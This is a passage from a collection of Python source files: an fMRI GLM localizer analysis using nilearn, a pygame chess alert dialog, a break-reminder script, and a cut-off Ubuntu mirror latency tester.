'/Volumes/VUHDD/NROST_analysis/'\noutdir = 'results'\nif not os.path.exists(rawDataFolder+outdir+'/figures/'):\n try:\n os.makedirs(rawDataFolder+outdir+'/figures/')\n except:\n pass\n\n# Let's go\nif any('sub-' in s for s in os.listdir(rawDataFolder)): # check whether there is any subject data\n\n # Preparations\n os.chdir(derDataFolder+'fmriprep/')\n folderlist = next(os.walk('.'))[1]\n folderlist.sort()\n os.chdir(rawDataFolder)\n subList = []\n z_map_all = []\n model_all = []\n \n for i in range(len(folderlist)):\n try:\n subList.append(folderlist[i].split(\"sub-\",1)[1])\n nrSubj = folderlist[i].split(\"sub-\",1)[1]\n print('\\n...running subject {0}...\\n'.format(nrSubj))\n # Get entire run and average across it\n try:\n fmri_img = image.concat_imgs(derDataFolder+'fmriprep/sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj))\n mean_img = image.mean_img(derDataFolder+'fmriprep/sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj))\n events = pd.read_csv(rawDataFolder+'sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_events.tsv'.format(nrSubj), sep='\\t')\n # Get confounds file and drop unnecessary confounds\n # Gilles recommended for my design aComCors and FD. We can use all derivatives from aComCor as well because the t_r is so low. \n # We also include the six motion parameters (X,Y,Z,and three rotations)\n # I read somewhere that averaging FD on group level for the conditions is also beneficial (I guess for second level analysis)\n confounds = pd.read_csv(derDataFolder+'fmriprep/sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_bold_confounds.tsv'.format(nrSubj), \n usecols=['FramewiseDisplacement','aCompCor00','aCompCor01','aCompCor02','aCompCor03','aCompCor04','aCompCor05',\n 'Cosine00', 'Cosine01', 'Cosine02', 'Cosine03', 'X','Y','Z','RotX','RotY','RotZ'], sep='\\t')\n except:\n fmri_img = image.concat_imgs(derDataFolder+'fmriprep/sub-{0}/ses-02/func/sub-{0}_ses-02_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj))\n mean_img = image.mean_img(derDataFolder+'fmriprep/sub-{0}/ses-02/func/sub-{0}_ses-02_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj))\n events = pd.read_csv(rawDataFolder+'sub-{0}/ses-02/func/sub-{0}_ses-02_task-Localizer_run-9_events.tsv'.format(nrSubj), sep='\\t')\n confounds = pd.read_csv(derDataFolder+'fmriprep/sub-{0}/ses-02/func/sub-{0}_ses-02_task-Localizer_run-9_bold_confounds.tsv'.format(nrSubj), \n usecols=['FramewiseDisplacement','aCompCor00','aCompCor01','aCompCor02','aCompCor03','aCompCor04','aCompCor05',\n 'Cosine00', 'Cosine01', 'Cosine02', 'Cosine03', 'X','Y','Z','RotX','RotY','RotZ'], sep='\\t')\n\n except Exception as e:\n print('', e, '')\n continue # if not a subject folder or no localizer image, move on to next iteration\n\n # The first TR cannot have a value for FD, so we set it to the value of the second slice\n confounds['FramewiseDisplacement'].iloc[0] = confounds['FramewiseDisplacement'].iloc[1]\n\n # Create first level model\n fmri_glm = FirstLevelModel(t_r=t_r,\n noise_model='ar1',\n standardize=False,\n hrf_model='glover',\n drift_model='cosine',\n period_cut=160,\n subject_label='sub-{0}'.format(nrSubj),\n mask=None,\n minimize_memory=True,\n n_jobs=-1)\n fmri_glm = fmri_glm.fit(fmri_img, events, confounds)\n design_matrix = fmri_glm.design_matrices_[0]\n\n if plot_design:\n # Plot design matrix\n plot_design_matrix(design_matrix) \n\n # Save the matrix image to disc\n #plot_design_matrix(design_matrix, output_file=join(outdir, 'design_matrix.png'))\n\n # Plot expected response to negative cows\n plt.plot(design_matrix['dresserReal1'])\n plt.xlabel('scan')\n plt.title('Expected dresser1 intact response')\n\n # Detect voxels with significant effects fro positive vs drop contrast\n otherRegressors = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.] # not conditions\n conditions = {\n 'intact': array([1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.]\n +otherRegressors),\n 'scrambled': array([0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n ]+otherRegressors),\n 'fixation': array([0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n ]+otherRegressors),\n }\n\n #intact_minus_scrambled = conditions['scrambled'] - conditions['fixation']\n #intact_minus_scrambled = conditions['intact'] - conditions['fixation']\n intact_minus_scrambled = conditions['intact'] - conditions['scrambled']\n\n if plot_design:\n plot_contrast_matrix(intact_minus_scrambled, design_matrix=design_matrix)\n\n eff_map = fmri_glm.compute_contrast(intact_minus_scrambled,\n output_type='effect_size')\n\n z_map = fmri_glm.compute_contrast(intact_minus_scrambled,\n output_type='z_score')\n \n t_map = fmri_glm.compute_contrast(intact_minus_scrambled,\n output_type='stat') # stat corresponds to t map\n\n ###############################################################################\n # Plot thresholded z scores map.\n #\n # We display it on top of the average\n # functional image of the series (could be the anatomical image of the\n # subject). We use arbitrarily a threshold of 3.0 in z-scale. We'll\n # see later how to use corrected thresholds. we show to display 3\n # axial views: display_mode='z', cut_coords=3\n if plot_zMap:\n plot_stat_map(z_map, bg_img=mean_img, threshold=3.0,\n display_mode='z', cut_coords=3, black_bg=True,\n title='Sub{0}: Intact vs. scrambled (Z>3)'.format(nrSubj))\n plt.show()\n\n ###############################################################################\n # Statistical signifiance testing. One should worry about the\n # statistical validity of the procedure: here we used an arbitrary\n # threshold of 3.0 but the threshold should provide some guarantees on\n # the risk of false detections (aka type-1 errors in statistics). One\n # first suggestion is to control the false positive rate (fpr) at a\n # certain level, e.g. 0.001: this means that there is.1% chance of\n # declaring active an inactive voxel.\n\n if plot_FPR:\n from nistats.thresholding import map_threshold\n _, threshold = map_threshold(z_map, level=.001, height_control='fpr')\n print('Uncorrected p<0.001 threshold: %.3f' % threshold)\n plot_stat_map(z_map, bg_img=mean_img, threshold=threshold,\n display_mode='z', cut_coords=3, black_bg=True,\n title='Sub{0}: Intact vs. scrambled (p<0.001)'.format(nrSubj))\n plt.show()\n\n ###############################################################################\n # The problem is that with this you expect 0.001 * n_voxels to show up\n # while they're not active --- tens to hundreds of voxels. A more\n # conservative solution is to control the family wise error rate,\n # i.e. the probability of making ony one false detection, say at\n # 5%. For that we use the so-called Bonferroni correction\n\n if plot_FWER:\n _, threshold = map_threshold(z_map, level=.05, height_control='bonferroni')\n print('Bonferroni-corrected, p<0.05 threshold: %.3f' % threshold)\n plot_stat_map(z_map, bg_img=mean_img, threshold=threshold,\n display_mode='z', cut_coords=3, black_bg=True,\n title='Sub{0}: Intact vs. scrambled (p<0.05, corrected)'.format(nrSubj))\n plt.show()\n\n ###############################################################################\n # This is quite conservative indeed ! A popular alternative is to\n # control the false discovery rate, i.e. the expected proportion of\n # false discoveries among detections. This is called the false\n # disovery rate\n\n if plot_FDR:\n _, threshold = map_threshold(z_map, level=.05, height_control='fdr')\n print('False Discovery rate = 0.05 threshold: %.3f' % threshold)\n plot_stat_map(z_map, bg_img=mean_img, threshold=threshold,\n display_mode='z', cut_coords=3, black_bg=True,\n title='Sub{0}: Intact vs. scrambled (fdr=0.05)'.format(nrSubj))\n plt.show()\n\n ###############################################################################\n # Finally people like to discard isolated voxels (aka \"small\n # clusters\") from these images. It is possible to generate a\n # thresholded map with small clusters removed by providing a\n # cluster_threshold argument. here clusters smaller than 10 voxels\n # will be discarded.\n\n if plot_clusterCorrect:\n clean_map, threshold = map_threshold(\n z_map, level=.05, height_control='fdr', cluster_threshold=10)\n plot_stat_map(clean_map, bg_img=mean_img, threshold=threshold,\n display_mode='z', cut_coords=3, black_bg=True,\n title='Sub{0}: Intact vs. scrambled (fdr=0.05), clusters > 10 voxels'.format(nrSubj))\n plt.show()\n\n ###############################################################################\n # Report the found positions in a table\n if clusterReport:\n table = get_clusters_table(z_map, stat_threshold=threshold,\n cluster_threshold=10)\n print(table)\n\n if plot_surface:\n ###############################################################################\n # Let's do a surface-based first level analysis\n #########################################################################\n # Project the fMRI image to the surface\n # -------------------------------------\n #\n # For this we need to get a mesh representing the geometry of the\n # surface. we could use an individual mesh, but we first resort to a\n # standard mesh, the so-called fsaverage5 template from the Freesurfer\n # software.\n fsaverage = nil.datasets.fetch_surf_fsaverage(mesh='fsaverage5') # fsaverage is high, fsaverage5 is low resolution\n\n #########################################################################\n # The projection function simply takes the fMRI data and the mesh.\n # Note that those correspond spatially, are they are bothin MNI space.\n full_run = '/Users/michlf/NROST_analysis/derivatives/fmriprep/sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj)\n texture = nil.surface.vol_to_surf(full_run, fsaverage.pial_right)\n\n #########################################################################\n # Perform first level analysis\n # ----------------------------\n #\n # This involves computing the design matrix and fitting the model.\n # We start by specifying the timing of fMRI frames\n n_scans = texture.shape[1]\n frame_times = t_r * (np.arange(n_scans) + .5)\n\n #########################################################################\n # Create the design matrix\n #\n # We specify an hrf model containing SPM (for now not Glover model and its time derivative)\n # the drift model is implicitly a cosine basis with period cutoff 128s.\n # MF: We can also add regressors of choice with add_regs & add_reg_names, so we will add some confound regressors\n design_matrix = make_first_level_design_matrix(frame_times,\n events=events,\n hrf_model='spm',\n add_regs=confounds.values,\n add_reg_names=list(confounds))\n\n #########################################################################\n # Setup and fit GLM.\n # Note that the output consists in 2 variables: `labels` and `fit`\n # `labels` tags voxels according to noise autocorrelation.\n # `estimates` contains the parameter estimates.\n # We keep them for later contrast computation.\n labels, estimates = run_glm(texture.T, design_matrix.values)\n\n #########################################################################\n # Estimate contrasts\n # ------------------\n # Specify the contrasts\n # For practical purpose, we first generate an identity matrix whose size is\n # the number of columns of the design matrix\n otherRegressors = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.] # not conditions\n basic_contrasts = {\n 'intact': array([1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.]\n +otherRegressors),\n 'scrambled': array([0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n ]+otherRegressors),\n 'fixation': array([0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n ]+otherRegressors),\n }\n\n contrasts = {\n \"scrambled vs fixation\": basic_contrasts['scrambled'] - basic_contrasts['fixation'],\n \"intact vs fixation\": basic_contrasts['intact'] - basic_contrasts['fixation'],\n \"intact vs scrambled\": basic_contrasts['intact'] - basic_contrasts['scrambled']\n }\n\n #########################################################################\n # contrast estimation\n\n # iterate over contrasts\n for index, (contrast_id, contrast_val) in enumerate(contrasts.items()):\n print(' Contrast % i out of %i: %s, right hemisphere' %\n (index + 1, len(contrasts), contrast_id))\n # compute contrast-related statistics\n contrast = compute_contrast(labels, estimates, contrast_val,\n contrast_type='t')\n # we present the Z-transform of the t map\n z_score = contrast.z_score() # present Z-transformed t map\n #z_score = contrast.effect # present t map\n # we plot it on the surface, on the inflated fsaverage mesh,\n # together with a suitable background to give an impression\n # of the cortex folding.\n nil.plotting.plot_surf_stat_map(\n fsaverage.infl_right, z_score, hemi='right',\n title=contrast_id, colorbar=True,\n threshold=2.3, bg_map=fsaverage.sulc_right)\n\n #########################################################################\n # Analysing the left hemisphere\n # -----------------------------\n\n #########################################################################\n # Project the fMRI data to the mesh\n texture = nil.surface.vol_to_surf(full_run, fsaverage.pial_left)\n\n #########################################################################\n # Estimate the General Linear Model\n labels, estimates = run_glm(texture.T, design_matrix.values)\n\n #########################################################################\n # Create contrast-specific maps\n for index, (contrast_id, contrast_val) in enumerate(contrasts.items()):\n print(' Contrast % i out of %i: %s, left hemisphere' %\n (index + 1, len(contrasts), contrast_id))\n # compute contrasts\n contrast = compute_contrast(labels, estimates, contrast_val,\n contrast_type='t')\n z_score = contrast.z_score()\n # Plot the result\n nil.plotting.plot_surf_stat_map(\n fsaverage.infl_left, z_score, hemi='left',\n title=contrast_id, colorbar=True,\n threshold=2.3, bg_map=fsaverage.sulc_left)\n\n # Other plotting\n # from nilearn import datasets\n # img = datasets.fetch_localizer_button_task()['tmap']\n # view = nil.plotting.view_img_on_surf(z_score, surf_mesh='fsaverage')\n\n # view.open_in_browser()\n\n nil.plotting.show()\n\n if make_mask:\n ### Compute anatomically constraint ROI based on functional localizer\n # An important question here is the moment of resampling\n # Do we resample before thresholding or after?\n # Resampling seems to lower activity of individual voxel\n # because the response becomes smeared out.\n # Alternatively, we could try resampled the template\n # to the preprocessed data instead of the other way around\n # However, original MNI space seems to be of the same size as the template\n # (thus larger) than the MNI coregistered preprocessed date from fMRI prep\n\n # Load anatomical atlas of pF\n atlas = image.load_img('/Users/michlf/Documents/GitHub/fMRI_NRoST/analysis/LOCatlas.nii.gz')\n atlasBool = image.load_img('/Users/michlf/Documents/GitHub/fMRI_NRoST/analysis/LOCatlas.nii.gz').get_data().astype(bool)\n # Resample contrast image to size of the atlas\n resampled_zmap = image.resample_to_img(z_map, atlas)\n # Threshold the contrast image and make an Niim object again\n zmapPreBool = resampled_zmap.dataobj.copy() # copy instead of referencing\n zmapPreBool[zmapPreBool < threshold] = 0 # Thresholded for checking\n zmapThreshed = image.new_img_like(resampled_zmap, zmapPreBool)\n zmapBool = (resampled_zmap.dataobj[:] > threshold) # Thresholded boolean for intersection\n zmapThreshedBool = image.new_img_like(resampled_zmap, zmapBool.astype(np.int))\n # Intersect boolean arrays of contrast image and anatomical image and reformat in Niim objects\n intersection = np.logical_and(zmapBool, atlasBool)\n intersection_img = image.new_img_like(resampled_zmap, intersection.astype(np.int))\n if make_mask_plot: # commenting out the show command will lead to memory overflow due to too many figures\n # Check the maps \n nil.plotting.plot_glass_brain(atlas, colorbar=True, title='Original Harvard atlas of posterior temporal fusiform gyrus',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(z_map, colorbar=True, title='contrast image',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(resampled_zmap, colorbar=True, title='resampled contrast image',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(zmapThreshed, colorbar=True, title='contrast image thresholded at {0}'.format(threshold),\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(zmapThreshedBool, colorbar=True, title='contrast image thresholded at {0} in Boolean'.format(threshold),\n plot_abs=False, display_mode='ortho')\n # Plot anatomically constraint functional localizer\n nil.plotting.plot_glass_brain(intersection_img, colorbar=True, title='Anatomically constraint functional localizer mask',\n plot_abs=False, display_mode='ortho')\n nil.plotting.show()\n print('','time to inspect the plots','')\n # Assess the number of voxels in the mask\n # Katya used 31 voxel before substituting the intersection mask with the atlas map\n # Not sure whether that was 31 per hemisphere...\n if 'mask_info' in locals():\n mask_info = np.vstack( (mask_info, np.array([nrSubj, np.sum(zmapBool), np.sum(intersection)])) )\n else:\n mask_info = np.array([nrSubj, np.sum(zmapBool), np.sum(intersection)])\n print(mask_info)\n \n # We can now save the roi as mask\n # Note that we could subsegment the mask in connected regions\n # For details see tutorial https://nilearn.github.io/auto_examples/04_manipulating_images/plot_roi_extraction.html\n intersection_img.to_filename(join(outdir,'LOCmask_sub{0}.nii.gz'.format(nrSubj))) # or nibabel.save()\n\n # Pause to inspect\n if pause_analysis:\n input(\"Press Enter to continue...\")\n \n # Store each subjects data\n z_map_all.append(z_map)\n model_all.append(fmri_glm)\n\n # Plot first model for each subject\n if plot_all:\n fig1, axes1 = plt.subplots(nrows=2, ncols=math.ceil(len(z_map_all)/2), figsize=(8, 4.5))\n print(os.getcwd())\n for i in range(len(z_map_all)):\n # Using the following way of masking works if you provide the keyword threshold to the plot\n thresh_1stModel = math_img(\"np.ma.masked_less(img, [{0}])\".format(threshold), img=z_map_all[i])\n nil.plotting.plot_glass_brain(thresh_1stModel, colorbar=True, threshold=threshold,\n title=(model_all[i].subject_label),\n axes=axes1[int(i / math.ceil(len(z_map_all)/2)), int(i % math.ceil(len(z_map_all)/2))],\n plot_abs=False, display_mode='lr')\n nil.plotting.plot_glass_brain(thresh_1stModel, colorbar=True, threshold=threshold,\n title=(model_all[i].subject_label),\n plot_abs=False, display_mode='lr',\n output_file=outdir+'/figures/{0}.pdf'.format(model_all[i].subject_label))\n fig1.suptitle('subjects z_map intact vs. scrambled (unc z<{0})'.format(threshold))\n #nil.plotting.show()\n\n # Second level analysis (this still needs some work)\n if second_level:\n second_level_input = model_all\n second_level_model = SecondLevelModel()\n second_level_model = second_level_model.fit(second_level_input)\n zmap = second_level_model.compute_contrast(first_level_contrast=intact_minus_scrambled, output_type='z_score')\n \n # Plot\n nil.plotting.plot_glass_brain(zmap, colorbar=True, threshold=threshold,\n title='Object network (only z threshold of +-{0})'.format(threshold),\n plot_abs=False, display_mode='ortho')\n #nil.plotting.show()\n # Plot only positive z voxels above threshold\n masked_zmap = math_img(\"np.ma.masked_less(img, [{0}])\".format(threshold), img=zmap)\n nil.plotting.plot_glass_brain(masked_zmap, colorbar=True, threshold=None,\n title='Object network (only masked z<{0})'.format(threshold),\n plot_abs=False, display_mode='ortho')\n #nil.plotting.show()\n # Plot only positive z voxels\n masked_zmap1 = math_img(\"np.ma.masked_less(img, [{0}])\".format(threshold), img=zmap)\n nil.plotting.plot_glass_brain(masked_zmap1, colorbar=True, threshold=-threshold,\n title='Object network (masked z<{0} and thresholded at -{0}'.format(threshold),\n plot_abs=False, display_mode='ortho')\n #nil.plotting.show()\n\n # Localizer mask for 2nd level\n atlas1 = image.load_img('/Users/michlf/Documents/GitHub/fMRI_NRoST/analysis/LOCatlas.nii.gz')\n # resample the lower res zmap to the higher res atlas\n resampled_zmap = image.resample_to_img(zmap, atlas1)\n # Thresholdand make an Niim object again\n zmapPreBool = resampled_zmap.dataobj.copy()\n zmapPreBool[zmapPreBool < threshold] = 0\n zmapThreshed = image.new_img_like(resampled_zmap, zmapPreBool)\n zmapBool = (resampled_zmap.dataobj > threshold)\n zmapThreshedBool = image.new_img_like(resampled_zmap, zmapBool.astype(np.int))\n # Check it\n nil.plotting.plot_glass_brain(zmap, colorbar=True, title='original zmap',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(resampled_zmap, colorbar=True, title='resampled zmap',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(zmapThreshed, colorbar=True, title='original zmap thresholded at {0}'.format(threshold),\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(zmapThreshedBool, colorbar=True, title='original zmap thresholded at {0} in Boolean'.format(threshold),\n plot_abs=False, display_mode='ortho')\n #nil.plotting.show()\n # Now make all boolean so that we intersect the maps\n atlasBool = image.load_img('/Users/michlf/Documents/GitHub/fMRI_NRoST/analysis/LOCatlas.nii.gz').get_data().astype(bool)\n # Intersect and make it Niim object\n intersection = np.logical_and(zmapBool, atlasBool)\n atlasBoolPlt = image.new_img_like(resampled_zmap, atlasBool.astype(np.int))\n intersection_img = image.new_img_like(resampled_zmap, intersection.astype(np.int))\n # Plot the map\n nil.plotting.plot_glass_brain(atlas1, colorbar=True, title='Original Harvard atlas of posterior temporal fusiform gyrus',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_roi(atlas1, title='Original Harvard atlas',\n display_mode='ortho')\n nil.plotting.plot_roi(atlasBoolPlt, title='Original Harvard atlas (boolean)',\n display_mode='ortho')\n nil.plotting.plot_glass_brain(intersection_img, colorbar=True, title='Intersection map',\n plot_abs=False, display_mode='ortho')\n nil.plotting.show()\n # We can now save the roi as mask\n # Note that we could subsegment the mask in connected regions\n # For details see tutorial https://nilearn.github.io/auto_examples/04_manipulating_images/plot_roi_extraction.html\n intersection_img.to_filename(join(outdir,'LOCmask_2ndlevel.nii.gz'))\n # Let's also save the resampled anatomical mask\n atlasBoolPlt.to_filename(join(outdir,'LOCmask_anat.nii.gz'))\n # Assess the number of voxels in the mask\n # Katya used 31 voxel before substituting the intersection mask with the atlas map\n # Not sure whether that was 31 per hemisphere...\n if 'mask_info' in locals():\n mask_info = np.vstack( (mask_info, np.array([0, np.sum(zmapBool), np.sum(intersection)])) )\n else:\n mask_info = np.array([nrSubj, np.sum(zmapBool), np.sum(intersection)])\n print(mask_info)\n\n# END\n","sub_path":"analysis/GLM_testing_loc.py","file_name":"GLM_testing_loc.py","file_ext":"py","file_size_in_byte":31666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"277543552","text":"from .values.dimens import *\nfrom .values.colors import CHESS_WHITE, AlertDialogBG, AlertDialogFG\nfrom .values.assets import gameFont\n\n\nclass AlertDialog:\n def __init__(self, win, alertText, title='Chess', positiveBtn=None, negativeBtn=None):\n self.win = win\n self.alertText = alertText\n self.title = title\n self.pBtn = positiveBtn\n self.nBtn = negativeBtn\n self.pBtnRect = None\n self.nBtnRect = None\n\n def show(self):\n pygame.draw.rect(self.win, AlertDialogBG, ((AlertDialogStartX, AlertDialogStartY),\n (AlertDialogLenX, AlertDialogLenY)),\n border_radius=DialogTitleHeight // 2)\n pygame.draw.rect(self.win, AlertDialogFG,\n ((DialogInX, DialogInY), (DialogInLenX, DialogInLenY)),\n border_bottom_left_radius=DialogTitleHeight // 2,\n border_bottom_right_radius=DialogTitleHeight // 2)\n\n self.drawText(self.title, 50, AlertDialogStartX + AlertDialogLenX // 2, AlertDialogStartY +\n (dialogPad + DialogTitleHeight) // 2, CHESS_WHITE, font=gameFont, centre='XY')\n\n if '*' not in self.alertText:\n self.drawText(self.alertText, 40, DialogInX + DialogInLenX // 2, DialogInY + SquareDimen,\n CHESS_WHITE, centre=True)\n else:\n texts = self.alertText.split('*')\n length = SquareDimen // (len(texts) + (len(texts) % 2))\n for txt in texts:\n self.drawText(txt, 30, DialogInX + DialogInLenX // 2, DialogInY + length, CHESS_WHITE, centre=True)\n length += SquareDimen // 2\n\n btnX = DialogInX + int(0.125 * DialogInLenX)\n btnLenY = int(DialogInLenY * 0.2)\n btnY = DialogInY + int(0.7 * DialogInLenY)\n if self.nBtn:\n btnLenX = min(int(1.5 * SquareDimen), max(SquareDimen, 30 * (len(self.nBtn) + 2)))\n self.nBtnRect = pygame.draw.rect(self.win, CHESS_WHITE, ((btnX, btnY), (btnLenX, btnLenY)),\n border_radius=15)\n self.drawText(self.nBtn[0], 20, btnX + btnLenX // 2, btnY + btnLenY // 2, (0, 0, 0), centre=True)\n if self.pBtn:\n btnLenX = min(int(1.5 * SquareDimen), max(SquareDimen, 30 * (len(self.pBtn) + 2)))\n self.pBtnRect = pygame.draw.rect(self.win, CHESS_WHITE, ((btnX + DialogInLenX // 2, btnY),\n (btnLenX, btnLenY)), border_radius=15)\n self.drawText(self.pBtn[0], 20, btnX + DialogInLenX // 2 + btnLenX // 2, btnY + btnLenY // 2, (0, 0, 0),\n centre=True)\n pygame.display.update()\n\n def drawText(self, text, size, txtX, txtY, color, colorBg=None, font=gameFont, centre=False):\n Txt = pygame.font.Font(font, size).render(text, True, color, colorBg)\n nameRect = Txt.get_rect()\n if centre in [False, 'X', 'Y']:\n if centre == 'Y':\n txtX += nameRect.center[0]\n elif centre == 'X':\n txtY += nameRect.center[1]\n else:\n txtX += nameRect.center[0]\n txtY += nameRect.center[1]\n nameRect.center = (txtX, txtY)\n self.win.blit(Txt, nameRect)\n","sub_path":"Game/alertDialog.py","file_name":"alertDialog.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"5712374","text":"import webbrowser\nimport time\n\n\ntotal_breaks = 3\nbreak_count= 0\n\nwhile(break_count < total_breaks):\n\ttime.sleep(2*60*60)\n\twebbrowser.open(\"https://www.youtube.com/watch?v=StTqXEQ2l-Y\")\n\tbreak_count = break_count + 1\n\ttime.ctime()\n\tprint (\"This program started on \" + time.ctime())\n","sub_path":"take_a_break.py","file_name":"take_a_break.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"553753951","text":"import asyncio\r\nimport concurrent.futures\r\nimport requests\r\nimport json\r\nimport socket\r\nimport pycurl\r\nfrom urllib.parse import urlparse\r\nfrom haversine import haversine\r\nfrom io import BytesIO\r\n\r\n\r\ndef _ipToGeoloc(ipaddr):\r\n res = requests.get(\"http://api.ipstack.com/\"\\\r\n + ipaddr\\\r\n + \"?access_key=1e7beb7517ccc392c760dd63e3fa0917\")\r\n\r\n if res.status_code == 200:\r\n result = json.loads(res.text)\r\n return result['latitude'], result['longitude']\r\n else:\r\n raise Exception(res.status_code)\r\n\r\n\r\ndef _getMyGeoloc():\r\n return _ipToGeoloc('check')\r\n\r\n\r\ndef _urlToIp(url):\r\n o = urlparse(url)\r\n hostname = o.hostname\r\n port = o.port or (443 if o.scheme == 'https' else 80)\r\n ip_addr = socket.getaddrinfo(hostname, port)[0][4][0]\r\n return ip_addr\r\n\r\n\r\ndef getMirrorUrls(country='mirrors'):\r\n res = requests.get('http://mirrors.ubuntu.com/' + country + '.txt')\r\n\r\n if res.status_code == 200:\r\n return res.text.split(\"\\n\")\r\n else:\r\n raise Exception(res.status_code)\r\n \r\n\r\ndef getMirrorsWithLocation(sorted=True):\r\n mirrors = []\r\n \r\n for url in getMirrorUrls():\r\n try:\r\n ip_addr = _urlToIp(url)\r\n geoloc = _ipToGeoloc(ip_addr)\r\n mirrors.append((url, geoloc))\r\n except Exception as e:\r\n # current mirror is unreachable\r\n pass\r\n\r\n if sorted:\r\n myloc = _getMyGeoloc()\r\n mirrors.sort(key=lambda x: haversine(x[1], myloc))\r\n\r\n return mirrors\r\n\r\n\r\ndef getCandidates():\r\n mirrors = getMirrorsWithLocation()\r\n return [url for url, loc in mirrors]\r\n\r\n\r\ndef __getServerStat(url):\r\n c = pycurl.Curl()\r\n c.setopt(c.URL, url)\r\n c.setopt(c.WRITEDATA, BytesIO())\r\n c.setopt(c.TIMEOUT, 1)\r\n try:\r\n c.perform()\r\n stat = {\r\n \"time_namelookup\": c.getinfo(pycurl.NAMELOOKUP_TIME),\r\n \"time_connect\": c.getinfo(pycurl.CONNECT_TIME),\r\n \"time_appconnect\": c.getinfo(pycurl.APPCONNECT_TIME),\r\n \"time_pretransfer\": c.getinfo(pycurl.PRETRANSFER_TIME),\r\n \"time_redirect\": c.getinfo(pycurl.REDIRECT_TIME),\r\n \"time_starttransfer\": c.getinfo(pycurl.STARTTRANSFER_TIME),\r\n \"time_total\": c.getinfo(pycurl.TOTAL_TIME),\r\n \"speed_download\": c.getinfo(pycurl.SPEED_DOWNLOAD),\r\n \"speed_upload\": c.getinfo(pycurl.SPEED_UPLOAD),\r\n \"local_ip\": c.getinfo(pycurl.LOCAL_IP),\r\n \"local_port\": c.getinfo(pycurl.LOCAL_PORT)\r\n }\r\n except Exception as e:\r\n stat = {\r\n \"time_total\": 999999\r\n }\r\n c.close()\r\n\r\n return stat\r\n\r\n\r\nasync def __getAvgLatency(pool, url, trial=3):\r\n loop = asyncio.get_running_loop()\r\n times = await asyncio.gather(*[loop.run_in_executor(pool, lambda : __getServerStat(url)) for _ in range(trial)])\r\n return url, sum(map(lambda x: x['time_total'], times)) * 1000 // trial\r\n\r\n\r\nasync def _testLatencies(urls):\r\n loop = asyncio.get_running_loop()\r\n with concurrent.futures.ThreadPoolExecutor() as pool:\r\n wait_target = {__getAvgLatency(pool, url) for url in urls}\r\n done, pending = await asyncio.wait(wait_target) #, return_when=asyncio.FIRST_COMPLETED)\r\n for p in pending:\r\n p.cancel()\r\n\r\n responseTimes = list(map(lambda x: x.result(), done))\r\n responseTimes.sort(key=lambda x: x[1])\r\n return responseTimes\r\n\r\n\r\ndef testLatencies(urls):\r\n return asyncio.run(_testLatencies(urls))\r\n\r\n\r\ndef findOptimalMirror(urls):\r\n latencies = testLatencies(urls)\r\n return 